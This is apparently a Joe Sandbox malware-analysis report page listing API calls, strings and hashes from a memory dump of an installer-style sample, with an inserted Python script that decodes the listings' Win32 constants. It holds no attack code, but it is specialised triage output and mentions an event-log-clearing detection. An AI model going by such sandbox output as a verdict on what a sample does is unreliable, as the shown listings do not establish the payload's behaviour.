                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                              • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                              • API String ID: 1275171361-1187406825
                                                                                                                                                              • Opcode ID: 45efe9d6c834f9166e1e5b26416603740fc58f5fb146eb5a630193b3fab2f836
                                                                                                                                                              • Instruction ID: 0df18943897878fa7c4cd25feba974e7b9f542c7ff66e4f9b9b37d12eca744ed
                                                                                                                                                              • Opcode Fuzzy Hash: 45efe9d6c834f9166e1e5b26416603740fc58f5fb146eb5a630193b3fab2f836
                                                                                                                                                              • Instruction Fuzzy Hash: 7321F672A806247BD63219588C4AFAB367CFF51B70F11011AFF25FB3C1D6AA9C0196E5
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C6FB2
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007C71BE
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to read variable included flag., xrefs: 007C71AE
                                                                                                                                                              • Failed to read variable name., xrefs: 007C71A7
                                                                                                                                                              • Failed to read variable literal flag., xrefs: 007C7199
                                                                                                                                                              • Failed to read variable value type., xrefs: 007C71A0
                                                                                                                                                              • Failed to read variable value as number., xrefs: 007C7178
                                                                                                                                                              • Unsupported variable type., xrefs: 007C7184
                                                                                                                                                              • Failed to set variable value., xrefs: 007C7171
                                                                                                                                                              • Failed to read variable count., xrefs: 007C6FD2
                                                                                                                                                              • Failed to read variable value as string., xrefs: 007C718B
                                                                                                                                                              • Failed to set variable., xrefs: 007C7192
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                              • API String ID: 3168844106-528957463
                                                                                                                                                              • Opcode ID: c73b2426bd6ca5e6b18824b090df605df662b09af2858091cae0bb307e87e12c
                                                                                                                                                              • Instruction ID: f3b0750efdf6aafbcc92f75c177eb26407447b813e1c2343765fd56e4109f6c3
                                                                                                                                                              • Opcode Fuzzy Hash: c73b2426bd6ca5e6b18824b090df605df662b09af2858091cae0bb307e87e12c
                                                                                                                                                              • Instruction Fuzzy Hash: 4E716C71C0525EEBDF169AA4CC45FAEBBB9EF84710F14412DF910A6290DB389E50DFA0
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 00804550
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00804566
                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 008045BF
                                                                                                                                                              • GetLastError.KERNEL32 ref: 008045C9
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 0080461D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00804628
                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 00804717
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0080478A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 3286166115-2967768451
                                                                                                                                                              • Opcode ID: 1919d33a95d5cc302592e0d1c61e2db26e00b63ae4848e3e633b2dd7f0adac4c
                                                                                                                                                              • Instruction ID: 756c05a60be7a2b72cb9c7417286d9fb4cbec7301b8ac46f60a8b1b8a8e43d37
                                                                                                                                                              • Opcode Fuzzy Hash: 1919d33a95d5cc302592e0d1c61e2db26e00b63ae4848e3e633b2dd7f0adac4c
                                                                                                                                                              • Instruction Fuzzy Hash: 738125F2A8022AEBEB618E598C45B6B3698FF01724F215129FF15EB2D0E775CD0086D0
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,008072C8,?,?), ref: 00806DA6
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806E11
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806E89
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00806EC8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String$Free$Compare
                                                                                                                                                              • String ID: `<u$label$scheme$term
                                                                                                                                                              • API String ID: 1324494773-4028212031
                                                                                                                                                              • Opcode ID: 413568e6c923936f3a0eac1ed8cc77b9cc14cd472b756560e1de529384b76761
                                                                                                                                                              • Instruction ID: f8b77d627179d5250c421d08b32e2fdb168bf05fc7d51c1e12b704574dd76124
                                                                                                                                                              • Opcode Fuzzy Hash: 413568e6c923936f3a0eac1ed8cc77b9cc14cd472b756560e1de529384b76761
                                                                                                                                                              • Instruction Fuzzy Hash: 34514D35901219EBCB65DB94CC45FAEBBB8FF04721F2442A8E911E72E0E7319E60DB50
                                                                                                                                                              APIs
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007D4DC0
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007D4DEF
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007D4E3A
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007D4E66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CreateFromStringUuid
• String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
• API String ID: 4041566446-2510341293
• Opcode ID: 6c38915ebc93363910a729181f0100efad3e53cbe23b7ed31478da54a671bda7
• Instruction ID: cb507a9227c9e132e30a844e5dad7a293041bb6612f7020c908df6cfcc3e63db
• Opcode Fuzzy Hash: 6c38915ebc93363910a729181f0100efad3e53cbe23b7ed31478da54a671bda7
• Instruction Fuzzy Hash: 6E413772A40308ABDB21DAE4C949EDEB7F9BB44710F20412AE905EB340D6799945CBA0
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,007C548E,?,?), ref: 007DEA9D
• GetLastError.KERNEL32(?,007C548E,?,?), ref: 007DEAAA
• CreateThread.KERNEL32(00000000,00000000,007DE7B4,?,00000000,00000000), ref: 007DEB03
• GetLastError.KERNEL32(?,007C548E,?,?), ref: 007DEB10
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,007C548E,?,?), ref: 007DEB4B
• CloseHandle.KERNEL32(00000000,?,007C548E,?,?), ref: 007DEB6A
• CloseHandle.KERNEL32(?,?,007C548E,?,?), ref: 007DEB77
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
• String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
• API String ID: 2351989216-3599963359
• Opcode ID: d878dcd30251d8a70f75c61d06a202bd8b4df91e39dc0cb595eff3d9ea299e89
• Instruction ID: d803ff892b39a44dd9f6ef6b84e5feca0e52e84701f92180ddd90e4c8a8c850b
• Opcode Fuzzy Hash: d878dcd30251d8a70f75c61d06a202bd8b4df91e39dc0cb595eff3d9ea299e89
• Instruction Fuzzy Hash: 513196B6D01219BBD711AF998D85E9FBABCFF04750F11416AF914FB340E7349E0086A1
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,007C548E,?,?), ref: 007DE666
• GetLastError.KERNEL32(?,?,007C548E,?,?), ref: 007DE673
• CreateThread.KERNEL32(00000000,00000000,007DE3C8,00000000,00000000,00000000), ref: 007DE6D2
• GetLastError.KERNEL32(?,?,007C548E,?,?), ref: 007DE6DF
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,007C548E,?,?), ref: 007DE71A
• CloseHandle.KERNEL32(?,?,?,007C548E,?,?), ref: 007DE72E
• CloseHandle.KERNEL32(?,?,?,007C548E,?,?), ref: 007DE73B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
• String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
• API String ID: 2351989216-1977201954
• Opcode ID: 0576653ae6b708e36a32b0971873dadbbf93643cbdb370b35169ff221c9604ff
• Instruction ID: 692911fa237d1390bab0d2b9e5a18e57f130a31e8993926431318d2f9636949a
• Opcode Fuzzy Hash: 0576653ae6b708e36a32b0971873dadbbf93643cbdb370b35169ff221c9604ff
• Instruction Fuzzy Hash: 9B318676D00629BBD7629B99CC05A9FBBF8FF44710F114166FD10FA340E77899008AE1
APIs
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,007C5405,007C53BD,00000000,007C5445), ref: 007E1506
• GetLastError.KERNEL32 ref: 007E1519
• GetExitCodeThread.KERNEL32(0080B488,?), ref: 007E155B
• GetLastError.KERNEL32 ref: 007E1569
• ResetEvent.KERNEL32(0080B460), ref: 007E15A4
• GetLastError.KERNEL32 ref: 007E15AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
• String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
• API String ID: 2979751695-3400260300
• Opcode ID: e6e576d2d640786a12854cbe3a1b07ebda9490fc06fba6052830545d02ca8482
• Instruction ID: a836057aa9e2b5ff31200bf1528e924aa6e80cb44636c1e254eb3aefac4bcdba
• Opcode Fuzzy Hash: e6e576d2d640786a12854cbe3a1b07ebda9490fc06fba6052830545d02ca8482
• Instruction Fuzzy Hash: BD31E871A02245EBD7109F668D06BBF7BFCFF48710B50406AF916DA260E738CA509B61
APIs
• SetEvent.KERNEL32(0080B478,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?), ref: 007E161B
• GetLastError.KERNEL32(?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?,007C5489,FFF9E89D,007C5489), ref: 007E1625
• WaitForSingleObject.KERNEL32(0080B488,000000FF,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?,007C5489), ref: 007E165F
• GetLastError.KERNEL32(?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000,?,007C5489,FFF9E89D,007C5489), ref: 007E1669
• CloseHandle.KERNEL32(00000000,007C5489,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000), ref: 007E16B4
• CloseHandle.KERNEL32(00000000,007C5489,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000), ref: 007E16C3
• CloseHandle.KERNEL32(00000000,007C5489,?,00000000,?,007CC1D3,?,007C53BD,00000000,?,007D784D,?,007C566D,007C5479,007C5479,00000000), ref: 007E16D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseHandle$ErrorLast$EventObjectSingleWait
• String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
• API String ID: 1206859064-226982402
• Opcode ID: ece5351eec2c4244dfa3f779d031295e63e5eb0077b129c711c28a510c7debdd
• Instruction ID: b02ebc19baffc489394877ebc6e13cf8d34210c619262c3e08e02e5289fbd2fc
• Opcode Fuzzy Hash: ece5351eec2c4244dfa3f779d031295e63e5eb0077b129c711c28a510c7debdd
• Instruction Fuzzy Hash: 8F212933502A22F7C7215B56CC0AB56B7A4FF0C721F550225F914A5EA0DB7DEC60CAD9
APIs
  • Part of subcall function 00800523: EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 00800533
  • Part of subcall function 00800523: LeaveCriticalSection.KERNEL32(0082B5FC,?,?,0082B5F4,?,007D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,007C54FA,?), ref: 0080067A
• OpenEventLogW.ADVAPI32(00000000,Application), ref: 007D4212
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007D421E
• ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008139D4,00000000), ref: 007D426B
• CloseEventLog.ADVAPI32(00000000), ref: 007D4272
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
• String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
• API String ID: 1844635321-1389066741
• Opcode ID: 32b35afd8781b8063ff9c0f9d4643c7c351b3beabc445e6d917abc269d3ca7ee
• Instruction ID: 504fed0f5efe079af96ef0c4ee75615ac07865f9bf6e99552958c302af11f33f
• Opcode Fuzzy Hash: 32b35afd8781b8063ff9c0f9d4643c7c351b3beabc445e6d917abc269d3ca7ee
• Instruction Fuzzy Hash: 20F0D132A85A717AD63122A65C0EEBB1C7CFE82F317010019BC60F1380EB5C998185F5
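Reading these listings by hand is slow because the plugin prints raw stack values, so what a slot means (a timeout, an event-log type, a window message) has to be recovered from the Win32 prototype. The script below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. It parses lines in the APIs and String ID format shown above, names the constants in the slots that matter for these particular functions, checks whether a CreateThread start address falls inside the image (base 007C0000 from the Offset field; the 0x70000 size is my assumption covering the associated dumps), and collects the source-file strings that belong to the WiX Burn bootstrapper engine (pipe.cpp, uithread.cpp, splashscreen.cpp, cabextract.cpp, logging.cpp, cache.cpp, and the BurnPipe.%s pipe-name format). That Burn identification is mine, drawn from the strings on the page; the report does not state it, and it says nothing about what the bundle's payload does. Two caveats a reviewer should keep in mind: the 000000FF in the WaitForSingleObject/WaitForMultipleObjects timeout slot and the 000000EB index passed to GetWindowLongW are treated as one-byte sign-extended immediates (-1 = INFINITE, -21 = GWL_USERDATA), which is an assumption about how the plugin renders `push imm8`, not something the report states. And the logging.cpp block above opens the Application log and calls ReportEventW with wType 00000001 (EVENTLOG_ERROR_TYPE), i.e. it writes an entry; no ClearEventLog call appears in this section, so the "clear windows event logs" signature in the overview must rest on a different function.

```python
"""Decode Joe Sandbox 'APIs' and 'String ID' listing lines like the ones above.
Added example written for this page: not Joe Sandbox code and not WiX/Burn code.
SAMPLE is copied from the report (trailing stack residue shortened); the constant
tables are standard Win32 values; image size is an assumption, base is the report's Offset."""
import re

# "• Func.MODULE(args), ref: ADDR" or "• Func.MODULE ref: ADDR", optional "Part of subcall function XXXXXXXX:" prefix.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
STRING_ID = re.compile(r"String ID:\s*(?P<ids>.+?)\s*$")
HEX8 = re.compile(r"^[0-9A-F]{8}$")
INFINITE = 0xFFFFFFFF
EVENTLOG_TYPES = {1: "EVENTLOG_ERROR_TYPE", 2: "EVENTLOG_WARNING_TYPE", 4: "EVENTLOG_INFORMATION_TYPE"}
WINDOW_MESSAGES = {0x0002: "WM_DESTROY", 0x0082: "WM_NCDESTROY"}
WINDOW_LONG_INDEX = {-21: "GWL_USERDATA", -4: "GWL_WNDPROC"}
# WiX Burn engine source files / pipe-name format: my identification from the page's strings, not a report verdict.
BURN_MARKERS = {"pipe.cpp", "uithread.cpp", "splashscreen.cpp", "cabextract.cpp",
                "logging.cpp", "cache.cpp", "BurnPipe.%s"}

def parse_arg(tok):
    """'00000001' -> 1, '?' -> None (unknown to the plugin), anything else stays a literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if HEX8.match(tok) else tok

def imm8_as_int32(value):
    """Assumption about the rendering: a one-byte immediate such as 'push -1' is
    printed as 000000FF, so recover the sign-extended value for small slots."""
    return value - 0x100 if 0x80 <= value < 0x100 else value

def parse_api_line(line):
    m = API_LINE.search(line)
    if not m:
        return None
    args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    return {"func": m["func"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)}

def decode(call, image_base, image_size):
    """Name the constants in the argument slots that matter for these functions."""
    f, a = call["func"], call["args"]
    slot = lambda i: a[i] if i < len(a) else None
    notes = []
    if f in ("WaitForSingleObject", "WaitForMultipleObjects"):
        ms = slot(1 if f == "WaitForSingleObject" else 3)
        if isinstance(ms, int):
            ms = INFINITE if imm8_as_int32(ms) == -1 else ms
            notes.append("timeout=INFINITE" if ms == INFINITE else f"timeout={ms}ms")
        if f == "WaitForMultipleObjects" and isinstance(slot(2), int):
            notes.append(f"wait_all={bool(slot(2))}")
    elif f == "CreateEventW" and len(a) >= 4:
        notes.append(f"manual_reset={bool(slot(1))} initial_state={bool(slot(2))} "
                     + ("unnamed" if slot(3) == 0 else "named"))
    elif f == "CreateThread" and isinstance(slot(2), int):
        inside = image_base <= slot(2) < image_base + image_size
        notes.append(f"start=0x{slot(2):08X} ({'in image' if inside else 'outside image'})")
    elif f == "ReportEventW" and isinstance(slot(1), int):
        notes.append("type=" + EVENTLOG_TYPES.get(slot(1), hex(slot(1))))
    elif f == "GetWindowLongW" and isinstance(slot(1), int):
        idx = imm8_as_int32(slot(1))
        notes.append("index=" + WINDOW_LONG_INDEX.get(idx, str(idx)))
    elif f == "DefWindowProcW" and isinstance(slot(1), int):
        notes.append("msg=" + WINDOW_MESSAGES.get(slot(1), hex(slot(1))))
    return notes

def burn_markers(lines):
    """Burn source-file / format strings found in 'String ID' lines."""
    seen = set()
    for line in lines:
        m = STRING_ID.search(line)
        if m:
            seen.update(s.strip() for s in m["ids"].split("$"))
    return seen & BURN_MARKERS

def analyze(lines, image_base=0x007C0000, image_size=0x00070000):
    """(func, ref, notes) for every API line with something worth naming."""
    out = []
    for line in lines:
        call = parse_api_line(line)
        if call and (notes := decode(call, image_base, image_size)):
            out.append((call["func"], call["ref"], notes))
    return out

# Lines copied from the report above (trailing stack residue shortened).
SAMPLE = """\
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,007C548E,?,?), ref: 007DEA9D
• CreateThread.KERNEL32(00000000,00000000,007DE7B4,?,00000000,00000000), ref: 007DEB03
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,007C548E,?,?), ref: 007DEB4B
• WaitForSingleObject.KERNEL32(0080B488,000000FF,?,007CC1D3,?,007C53BD), ref: 007E165F
• Part of subcall function 00800523: EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,007D4207,00000000,Setup,_Failed,txt), ref: 00800533
• ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008139D4,00000000), ref: 007D426B
• GetWindowLongW.USER32(?,000000EB), ref: 007DE577
• DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE5B5
• String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to create pipe guid.$pipe.cpp
• String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
"""
```

To use it on the whole report, feed the saved page text to `analyze()` and `burn_markers()` line by line instead of SAMPLE; functions whose argument slots are all `?` produce no notes and are skipped, which is the plugin telling you the value was not a constant at that call site.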
APIs
• GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 007D949E
• GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 007D94C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast
• String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
• API String ID: 1452528299-4263581490
• Opcode ID: 8c850408e619395749829095272f448ca69f1d0dfac8bfac836fbcd909e29233
• Instruction ID: 7f004fc031acfee1cb71d21eb558a77f0dc74823832d47e8c69863af5ddc7e20
• Opcode Fuzzy Hash: 8c850408e619395749829095272f448ca69f1d0dfac8bfac836fbcd909e29233
• Instruction Fuzzy Hash: D5714172D01229ABDB11DF94C845FEEB7B8BF08720F15412AEA15F7391E73999418BA0
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 007DE577
• DefWindowProcW.USER32(?,00000082,?,?), ref: 007DE5B5
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 007DE5C2
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 007DE5D1
                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007DE5DF
                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 007DE5EB
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007DE5FC
                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 007DE61E
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 007DE626
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 007DE629
                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 007DE637
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
